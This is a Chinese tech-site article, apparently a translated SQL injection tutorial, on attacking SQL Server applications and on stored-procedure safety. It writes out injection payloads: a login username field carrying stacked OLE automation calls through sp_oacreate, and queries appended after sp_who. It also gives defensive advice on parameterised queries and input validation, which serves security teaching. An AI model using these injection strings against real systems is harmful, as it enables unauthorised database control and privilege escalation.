科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网软件频道SQL Server应用程序高级SQL注入(下)(4)

SQL Server应用程序高级SQL注入(下)(4)

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

一旦攻击者控制了数据库,他们就想利用那个权限去获得网络上更高的控制权。这可以通过许多途径来达到:

作者:gaoyuanan 来源:赛迪网技术社区 2007年9月7日

关键字: 注入 SQL Server SQL Server 各版本 数据库

  • 评论
  • 分享微博
  • 分享邮件

需要指出的是如果运行的环境是WIN NT4+IIS4平台上,那么通过这个程序运行的命令是以系统权限运行的。在IIS5中,它以一个比较低的权限IWAM_XXXaccount运行。

(4)这些例子阐述了这个技术的适用性;它可以使用''speech.voicetext''对象引起SQL SERVER发声:

declare @o int,@ret int 
exec sp_oacreate ''speech.voicetext'',@o out 
exec sp_oamethod @o,''register'',NULL,''foo'',''bar'' 
exec sp_oasetproperty @o,''speed'',150 
exec sp_oamethod @o,''speak'',NULL,''all your 
sequel servers are belong to,us'',528 
waitfor delay ''00:00:05''

我们可以在我们假定的例子中,通过指定在用户名后面来执行它(注意这个例子不仅仅是注入一个脚本,同时以admin权限登陆到应用程序):

Username:admin'';declare @o int,
@ret int exec sp_oacreate ''speech.voicetext'',
@o out exec sp_oamethod @o,''register'',NULL,''foo'',
''bar'' exec sp_oasetproperty @o,''speed'',150 exec sp_oamethod 
@o,''speak'',NULL,''all your sequel servers are belong to us'',
528 waitfor delay ''00:00:05''--

[存储过程]

传说如果一个ASP应用程序在数据库中使用了存储过程,那么SQL注入是不可能的。这句话只对了一半,这要看ASP脚本中调用这个存储过程的方式。本质上,如果一个有参数的查询被执行 ,并且用户提供的参数通过安全检查才放入到查询中,那么SQL注入明显是不可能发生的。但是如果攻击者努力影响所执行查询语句的非数据部分,这样他们就可能能够控制数据库。

比较好的常规的标准是:

如果一个ASP脚本能够产生一个被提交的SQL查询字符串,即使它使用了存储过程也是能够引起SQL注入的弱点。

如果一个ASP脚本使用一个过程对象限制参数的往存储过程中分配(例如ADO的用于参数收集的command对象),那么通过这个对象的执行,它一般是安全的。

明显地,既然新的攻击技术始终地被发现,好的惯例仍然是验证用户所有的输入。 为了阐明存储过程的查询注入,执行以下语句:

sp_who ''1'' select * from sysobjects 
or 
sp_who ''1'';select * from sysobjects

任何一种方法,在存储过程后,追加的查询依然会执行。

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章